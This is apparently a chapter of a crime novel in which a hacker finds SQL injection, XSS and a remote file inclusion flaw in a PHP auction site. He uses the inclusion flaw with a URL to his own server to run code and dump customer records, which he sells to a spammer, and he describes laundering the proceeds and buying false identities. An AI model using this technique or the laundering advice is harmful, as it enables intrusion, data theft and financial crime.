The Hunt

And So It Begins

The PHP code is written in a well-structured , well-formatted style. Logical and hierarchal variable names are used, and in all, it was a pleasure to read. There were, however, some rather obvious flaws lurking.

To start, there is the usual swag of SQL injection flaws from user inputted data:

Login.php: line 513

 $query = "select access from users where $user = user and $password = password"; 

core.php: Line 10

 $query = "select price, seller, information from products where productid = $prodid"; 

Although there is a rather good query inspector in place that would stop any SQL injection taking place, it is strangely not called for these two SQL queries. Probably someone just forgot and added in a quick raw call.

There was also some Cross Site Scripting exploitable. When posting a new auction an attacker would be able to post JavaScript code inside the auctioned item and use this to hijack client cookies, or redirect users to another site, possibly to harvest accounts, since no parsing of the auctioned item description is performed.

Small flaws on the scale of things; however, I could use the SQL injection to query all the customer information. I guess I really want to find something else, though, something juicier. The joy of PHP is the easy access it gives you to system sockets, commands, and files. This usually results in a system shell with a bit of time and luck ”if you give a man a bone he will turn it into a gun and shoot you in the back, eventually.

Dex went back to work, digging deeper into the mass of code, Interesting.

 Core.php /* Including a user defined style-sheet for each skin */ include("parse_userdata($input_style_dir)$input_style_file.css"); function parse_userdata($input_data) { $safedata = preg_replace(".","",$input_data); return($safedata); } 

This code seems to control the skinning engine, allowing developers to have different style sheets for users defined inside the data that is posted within the Web page.

There was input validation preformed on $input_style_dir using the function parse_userdata().The function parse_userdata() removes all ˜. characters , eliminating the chance of a directory transversal attack there when opening an include file.

Error messages seem to be returned directly to the user, though. By passing a nonexistent style_dir or style_file I am greeted with a nice error message .

 http://www.example.com/auctionwizz/index.php?style_dir=aaa&style_file=aaa  Warning  : main(): Failed opening '/home/virtual/jskew/home/httpd/html/auctionwizz/styles/aaa/aaa.css' for inclusion (include_path='.:/php/includes:/usr/share/php:/usr/share/pear') in /home/virtual/jskew/home/httpd/html/auctionwizz/core.php on line  419  

The first noticeable flaw in this code snippet is the fact that $style_file variable is not parsed for dots, whereas $style_dir is.

I could easily pass ../../../../../a into style_file and the server would try to include /home/virtual/jskew/home/httpd/a.css."

The only real problem here is the fact that whatever the file I try to open is, it has to end in .css. That s not so useful to me, considering css files are plaintext; none are executable html style sheets that usually contain only boring HTML layout information.

On the up-side, it had disclosed a little information; he now knew the current working directory on this server.

Every small bit of information does help, although I do think there is more to this exploit. I am, after all, now able to control one variable fully, and have decent control over another. Second, the server will run whatever these variables point to. If I could make them run some evil PHP code, they would.

Dex fires up a web browser to www.php.net reading some features of including files.

Maybe there is a way I can get rid of the .css, he mumbles, or somehow open a socket or pipe to another application on the system, he said out loud.

He thought, Remote included files; included in PHP v4.06 and above. Remote included files allow you to call a remote web server that may hold the required code you wish to run. This is obtained using a remote fopen call and can use either ftp:// or http:// protocols, for example: include ˜http://www.example.com/test.html .

Dex began to get excited, hopping around on his old, tired , broken computer chair . That s it! If I am able to make the server include some Trojan code sitting on another server of mine, that, in fact, ends in .CSS but returns PHP code, it should run the PHP code on their server. So,

 www.carbits.com/auctionwizz/index.php?style_dir=http://&style_file=www.private-server.com/test 

would result in:

 include('http://' . 'www.private-server.com/test'. '.css'); 

No parsing would take place, since I don t enter any dots in the style_dir portion.

Dex placed a sample Trojan test.css on his server house-el-home.com with the following body.

 <? $var = `id`; print($var); ?> 

Then he called www.carbits.com/auctionwizz/index.php?style_dir=http: //&style_file=www.private-server.com/test. The standard auction front page loaded, very scrambled looking from having no skin data. However, in the middle of the page sat:

 uid=99(nobody) gid=99(nobody) groups=99(nobody) 

It worked! Dex shouts.

www.carbits.com connected to my house-el-home.com server, inserted the code from the .CSS into the stack of code to parse for the page to load. However the .CSS had PHP interpretation tags around its body (<? ?>) so PHP parsed the file locally as a script on the server, and told me the result (the user running apache on www.carbits.com). Now the server will do anything I tell it to; all I have to do is place the exploit code somewhere it can reach it.

Ah, delight, that took almost an hour to find. And there is now very little work left in it. Dex pours yet another cup of coffee, his hands jittering steadily with caffeine and excitement.

Now to write some exploit code. I have to keep in mind that the only thing I want from this exploit is every user s demographic information. I am not out to deface, Denial of Service, or backdoor these servers.

So I think the easiest , smoothest way to get all the customer data would be to write another PHP script (kept on my server). This PHP script would include config.php (this contains the database username, password, table, and database name ).Then simply have a little raw SQL to select out all the database fields of every user and print them all.

This leaves little or no trace, since there will be only one connection to the server and this can be done through a chain of socks proxys. Plus I can keep the Trojan PHP code on a free Web host somewhere.

It was, after all, just a .CSS. Dex began to write the Trojan PHP code, and with the help of the full database schema it did not take long.

First, config.php is included (from the local machine). Then a connection to the database is made (using the variables imported from config.php). Then the full name, address, country, e-mail, and age are selected, where the credit card number is not null. I don t have any need for the actual credit card number, but I do want to make sure that every user has a credit card. The file is then saved as blue2.css (a name of one of the skins provided in AuctionWizzard) and uploaded to a free Web host (www.freehosting.com/raygun/blue2.css).

Hopefully this will not seem so obvious if someone finds the URL in a web server log. Time for some fun. An evil grin creeps over Dex s face, I don t know if I should be proud of being a spacker (a hacker that hacks for spammers) or not.

A visit to a large anonymity site provides some decently fast insecure proxy servers: one in Brazil, another in China, and a third in Estonia. Good geographical distance between all three, plus language barriers should guarantee a very hard-to-follow trace.

A local proxy sever chain is created, where all traffic is sent through the three proxy servers in series on its way to the destination host. The down side of this is speed; sending data to three slow hosts in weird parts of the world is by no means efficient, but it does provide a good level of anonymity. Time for action.

 www.carbits.com/auctionwizz/index.php?style_dir=http://&style_file=www.freehosting.com/raygun/blue2 

The page slowly loads as the traffic is sent around the globe. Ten seconds pass, fifteen, twenty. Then pages of data begin spewing over Dex s browser: names, addresses, e- mails , in handy, easy-to-read format.

Yes! Dex shouts, trying to not sound like he had any doubt in his own work.

The full list takes almost five minutes to download, showing the massive amount of customers this particular site has. A total of 1.5 million contacts were obtained from carbits.com. The same URL was called for www.autobuysell.com and www.speedracerparts.com, leaving one impressive text file containing just over 8.9 million contacts. This should fetch a decent price. I would be looking at least $6,000, maybe up to $7,000 for the whole list.

An e-mail is written back to Ralph informing him of the list, and how payment can be made.

 Ralph You can find the contact list at www.freehosting.com/raygun/contacts.txt. There is just over 8.9 million in the list (pipe-delimited values). Everyone there is interested in buying/selling car products and have valid credit cards. I think ,500 USD is a fair price (if you agree), would be good if you could make the payment to my PayPal account roger_dodger@mailhost.com. Thanks a lot Dex 

PayPal is a great money medium ”by being really a virtual bank and by needing only a credit card to fully authorize your PayPal account, it works perfectly with my debit cards.

The primary card he used was his epassport card (www.epassport.com) for PayPal transactions. Epassport is another debit card, so PayPal authorization works fine. PayPal works pretty well, but with limits on the amount of money you can send until you authorize who you are by adding details of another bank account to your account. A secret authorization key is billed to your credit card and is viewable in your statement, which you enter online, and your account is then unlocked and can send unlimited amounts of money. This is easy to bypass, though, since all you needed to do was obtain access to someone s online bank account or statements and credit card details, and simply use them to authorize you, or use a real credit card under a different name (such as a debit card).

Once the money is in my PayPal account I face a new problem, how do I get it out?

The only option to get money out of PayPal is to wire transfer it to an account in the same name somewhere.

I really don t like doing that from a large company such as PayPal. It s too risky, plus I bet FBI/CIA have full access to PayPal logs. So that leaves one thing left to do, spend the money.

Most online merchants now accept PayPal payments. Because they are instant, risk-free, and fraud-free, incentives often are offered to customers who can pay with PayPal instead of credit cards.

I will spend the money on IT gear, cheap hard drives , graphic cards, cell phones, iPAQs, etc., out of my PayPal account. Once I have the products I will place them for sale on eBay.

These act as easily liquefiable assets that could be used to obfuscate the source of the money. Plus, if he were able to get a good deal on the product from the supplier, he could stand to make another 10 percent profit when he auctioned it. When the product is sold he would instruct the buyer to send the money via a wire transfer to his American bank account, or a money order.

The amount of money is in small enough amounts that I don t really worry about government seeing it, plus I need to pay some bills locally.

Once everything is paid for he would then wire what s left of the cash to his offshore account in the Caymans. The money now has been through a few hands. The idea is simple, though. Buy products that act as cash ”IT gear runs little risk since so many people are interested by it. However, you have to be quick or your assets will devalue and turn to dust within a month or two.

A day later Dex gets an e-mail back from Ralph, who is pleased with the customer list and agrees on the set amount, but payment will not be until the end of the week. Dex puts his feet up and relaxes, some good money made this week, plus the sun is shining now. I think I ll go outside for a walk, get a coffee, enjoy the day, nothing to do till next week.

Just as he opens the front door he is confronted by an old friend, known only as Jack. Jack is a weasely-looking man in his mid-twenties who spent far too much time and money on heroin and cocaine. His pale white skin and sunken red eyes showed the scars of a bad drug addiction .

Jack, long time, no see, come in, Dex cheerfully says.

Dex leads Jack in, as he nervously peers around every corner.

A little paranoid there Jack? Relax a little man, it s me, Dex says comfortingly.

I I came by last week, you were, gone. Jack stutters.

Ah, it was Jack that was creeping around my door; that explains why my building manager was worried. This guy looks like an escaped mental patient, complete with a crazed look in his eye, Dex thinks.

Dex leads Jack in and tells him to sit down and relax. Jack does not relax, and instead wanders around checking the windows for any suspicious activity.

How he met Jack was another tale, but suffice it to say, he used to be a very smart hacker doing work for some of the largest dot-coms at the time, and was rumored to have had multiple job offers from the FBI and NSA for his skills in exploit design and cutting-edge security techniques. This guy was hot, very hot.

The only problem was his drug habit; Jack had made a lot of money from hacking and had been led into some crowds of people who had fed him a few too many mind-altering substances. A few too many is one word for it ”Jack could hardly write code now, always scared that his keyboard was secretly a key logger that was sending signals to the CIA about his whereabouts.

There is a very fine line between brilliance and insanity. Sadly, Jack had stepped over, way over, that line too many times, leaving a jabbering, paranoid, manic.

So Jack, what brings you to my neck of the woods? Dex says.

Ok, so, like here s the deal, the word is like, from some friends of mine, that there is someone with some cash, like a lot. I m talking a lot of cash, so much he could buy half the oil in the free world, and well, he wasn t exactly given this money. It s not like he stole it or anything, or maybe he did, it s not like someone misses it or anything, Jack babbles.

Ok so go on.

Yeah, so, yeah he has, like, all this money sitting in an account. And he s scared, because he s a paranoid freak that thinks, like, the world is going to swallow him up the second he touches the money.

Man, pot calling the kettle black here. Trying to get sense out of this guy is impossible !

Ok, so he s scared someone is going to notice this money that he ˜borrowed Jack? Dex calmly says.

Yeah, I know your, like, god, no, delete that, Buddha of money. Never seen anything like the stuff you pull off Dex, you re great. Thing is, right, he s looking for someone to lose all his money for him. Like everywhere, lose it in raindrops and under pillowcases if need be, but then, like, find it all again, and have it nice, clean, and folded-like.

Folded? I seriously think Jack is on something at the moment, he s making as much sense as a lemon, Dex thinks.

You mean, he s looking for someone to launder his money? Who is this guy, Jack?

I can t tell you, well I don t know, well, he s not anyone you know. He s from some very black hat underground crowds. Shady people who deal in shadows and smoke cigarettes, Mr. X and Mr. C style, you can trust them, though.

I consider myself to be a rather dodgy person, but ˜dealing in shadows ? This sounds over even my head and Jack does not fill me with any sort of confidence, Dex thinks.

I don t know Jack; it sounds a little too deep for me. How much money are we talking about here? Thousands, hundreds of thousands?

Hahaha, no way! We re talking hundreds of millions, this guy has a pile of cash so big, and he s sitting on it like some angry hen that just laid an egg she can t eat.

Dex s jaw drops . Hundreds of millions? You re kidding me, hundreds of millions? No way, this can t be for real. No one steals that much money, no, no one gets away with stealing that much money. What s more, people tend to miss an amount of money that size , usually a lot.

The deal is this man. If you can put his money through a wringer, scrub it so clean you can see your face in it, when it comes out the other side, you get to keep one percent of the total, says Jack.

Ok, instantly I am interested, a few million US dollars for one job, OK it s a risky job that will probably put me in jail for the rest of my life. But that much money, I could buy a house somewhere warm and retire. Not have to live by the skin of my teeth week by week. Could I do it? Could I launder that much? The most I have ever done before was $25,000, it wasn t hard but not exactly easy, Dex thinks . Out loud he says, I, I don t know Jack, can I talk to this guy and get some more details? I need to be sure what kind of a person he is. This is my neck on the line if this goes pear shaped you know.

This guy must either brain-dead stupid or insane. How the heck did he steal that much to start with? That s a very sizeable amount of money and would leave a very distinct trail behind it, he thinks.

Yeah I can have him call your, hmm, your, hmm Jack stumbles, his mind stopped in mid- sentence .

My cell phone? Dex fills in.

Yeah, he ll call that in a day or so, OK? says Jack.

Great man, I ll let you know how it all goes. I guess thanks for the heads up. Man, hmm take it easy Jack, OK? You seem a little tired. Try to get some sleep and relax. Hey you got my cell phone number right?

Yeah I do, I best be off now anyway, I have to see someone about a package on my way home. It s Tuesday today, right? says Jack as he wanders out the door.

I worry about Jack, he s just not right upstairs anymore. His lights are on, someone s definitely home, but that someone is hitting their head repeatedly on the wall. Dex decides to go out for a bit, catch up on some fresh air and food, and window-shopping is not half bad in this town.

As dusk draws in he decides on catching a brief nap then attacking the city at night. This city is filled with great music, his favorite is immersing trance, soul- lifting beats mixed with progressive euphoria. Trance music and hacking just seem to go together, a cyberistic feel all around you, a slow and steady mind-bending feeling, fueled by various visual hallucinogen s and body stimulants.

After retiring to bed for three or four hours Dex slipped into the night of the city, arriving at his favorite club at 11 p.m., which is full of loud music and strange people, but no computers.

At 3 a.m. something strange happened , his back pocket began to make sounds. Jingling and vibrating, Dex found this to be most disturbing .

So disturbing, in fact, that he left the club and stood outside, and reaching into his pocket he found his cell phone. Ah, it made a little more sense now; his cell phone was trying to communicate to him. Then the sound began again; the small object emitted a high-pitched jingle and various tones of light flashed out of it, while it hopped franticly around his hand like some small, excited animal.

Dex mangled a few of the buttons and placed the phone to his ear.

Hello? he nervously said, not knowing what to expect.

Hello Dex, I am Knuth. Jack sent me, said a deep voice on the other end.

Reality came flashing back, Jack, the money, laundering, the coffee, the hacking.

Knuth, yes, sorry, yes. I was just out somewhere, Dex says, slowly tripping over each word.

That s fine, is this a bad time? Or can you talk? I can call you back tomorrow, Knuth said.

Hmm yes, please do. Can you call me around 1 p.m. , we can talk then. I am very interested in your project, though. I think I can be of some assistance to you, says Dex.

I am most pleased; I will call you tomorrow then.

The phone is silent once more as if the event never happened. Dex is unsure if it really did happen, everything felt far too surreal to be reality right now. I think I need to go to bed, he grumbled.

In the morning reality is reality again, the coffee strong, the floor cold.

Dex places his cell phone within audible distance and begins to make some breakfast .

No sooner had he left his cell phone when it began to ring.

Hello, he said.

Dex, Knuth again. Are you OK today?

Yeah, sorry about last night. Don t really know where I was with that.

That s OK; I would really like to talk to you about what Jack spoke about, but not from here. Can you go down the street to the nearest payphone and call me on this number: 430-8276-8921? I ll be there for the next half hour.

Ok. Click.

I guess when you re dealing with this much money you get a little paranoid; fair enough, cell phones are not hard to tap these days anyway. Trusty payphones are still rather anonymous though. Dex wanders down the road and calls the number from the nearest payphone.

Hi, I have a pizza here for Knuth? he says.

Very funny , but thanks. I have to be very careful, no doubt Jack has told you about what my project is. And no doubt that you have some idea which law enforcement agencies would already be sniffing around me.

Yeah, I could imagine a few.

I ll cut to the chase. I have a lot of money I need laundered and I hear you can do it.

I ve been known to do a little of that from time to time, yes.

Well this isn t a little, and I need it done right. This represents the effort of a lot of people, and the amount is sizeable. I need to know right now if you can do it.

Dex thinks, Who does this guy think he is? I need time to think here.

How much are we talking about here? And what kind of laundering do you need done? Dex asks.

Over $300 million, up to $500 million. I need the money spread out and moved quickly, go through as many chains and loops as possible, it has to be very clean. The money must end up in South America for me to pick up, though, and it must end up there in less than two months, it can t be late.

And my cut?

I ll give you one percent of the total, just tell me an account and I ll move it in gradually as the money appears in the other accounts. If you can do better than 95 percent, we can talk bonus.

Dex ponders for a second, Do I?

Well? Are you in?

Risk, money, risk. Dex was bought. His fear had been surpassed by the chance of making a few million dollars.

Yes, I ll do it. But I will need some money up front to help set up accounts and identities. This is no small task you know. It has to be done correctly, and that costs, a lot.

How much, and where?

Dex thinks for a second; moving this much money around is not easy. Although smaller amounts work fine and usually go unnoticed, large amounts (over a million) are easily noticed.

He thinks, I will need to open real bank accounts, no debit cards or PayPal accounts this time. For this, I will need fake identification made, passports/birth certificates and drivers licenses. They aren t hard for me to get since I have some great contacts. The problem is the price, it s not cheap at all. To buy a full persona might cost $10,000. Something tells me I will need a few of them made, too.

Two hundred thousand US dollars, in the largest notes possible, please, Dex says, not knowing what the response to that would be.

That s fine; I will have someone deliver the money to you this week. And Dex, I really hope you don t try to rip me off here. I am, well, a very powerful man, and it would not be advisable to be on my bad side. For you, or for your friends and family. Do you understand me, Dex?

Yes, don t worry about a thing. I understand. To himself, he thinks, How come I feel like I am sinking all of a sudden, as though the ground is trying to swallow me up and some part of me is trying as hard as possible to resist. This better work.

I will have the money delivered to your home.

I would prefer somewhere else to be honest, says Dex.

No, your home or no money. Knuth snaps .

Oh OK then, Dex hesitantly says I m at

You re at 910 23rd Street, cross street 9th Avenue. You re in apartment 402, your bedroom window faces east onto the fire escape. My partner knows where to find you, and what you look like. No need to worry about mistaken identity, replied Knuth. Don t worry Dex, I am a nice person, to people who treat me with respect. If you work for me, you will be a very rich man. A very rich man indeed.

Click. The phone goes dead.

Dex got the feeling he was dealing with something over his head here. He just hoped that by the end of this he still had a head to go over.